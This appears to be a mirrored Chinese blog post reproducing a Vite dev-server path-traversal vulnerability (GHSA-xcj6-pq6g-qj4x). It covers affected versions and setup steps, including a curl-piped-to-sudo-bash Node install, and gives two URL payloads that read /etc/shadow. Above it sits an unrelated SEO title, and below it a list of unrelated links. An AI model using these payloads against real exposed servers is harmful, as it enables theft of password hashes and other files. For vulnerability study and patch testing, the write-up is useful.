当前位置: 首页 > news >正文

网站注册可以免费吗开发工具箱

news 2025/10/22 14:54:36
网站注册可以免费吗,开发工具箱,中国招生代理网,海南做房地产网站的网络公司漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/a/513200.html

相关文章:

  • 寮步镇网站建设网站版面设计流程包括哪些
  • 做海报用什么网站网络公司给销售公司做网站
  • EPLAN 保姆级入门教学
  • 动态规划经典问题学习笔记
  • java重构旧代码有哪些注意的点
  • 湛江廉江网站建设WordPress留言表单仿制
  • 如何优化一个网站案例网站模板_案例网
  • 青岛开发网站深圳福田区房子价格
  • JeecgBoot积木报表综合漏洞检测工具
  • 南召微网站开发免费开发游戏的软件
  • 寻找网站建设 网站外包wordpress评论页面美化
  • 营销网站建设企业筑人才官网
  • 多模态是什么意思
  • 在线音乐网站开发php上海资格证报名网站
  • 企业网站建设协议淘宝上可以做网站吗
  • 【JDBC】实战 养老中心护理项目的增删改查
  • 智慧校园顶层规划设计方案PPT(62页)
  • MATLAB | 函数或变量无法识别 / 函数缺失
  • 做网站用笔记本电脑wordpress 大内存
  • qq刷赞网站怎么做的网页策划案
  • 邯郸做网站多少钱企业网站的建立联系方式
  • 汕头网站建设培训公司免费微信网站制作
  • 新建网站推广给企业海口网站建设哪个好薇
  • jmeter测试dubbo接口
  • AI体测设备哪家好供应商
  • 网上做预算的网站宿州集团网站建设
  • 微信网站怎么做的好处站长统计性宝app
  • 网商网站怎么做合肥建站网站模板
  • 从零开始学阿里云服务器安全管理:防攻击、防泄漏、防漏洞
  • Berachain 推出原生借贷板块 BEND,为 PoL 生态进一步注入资金循环能力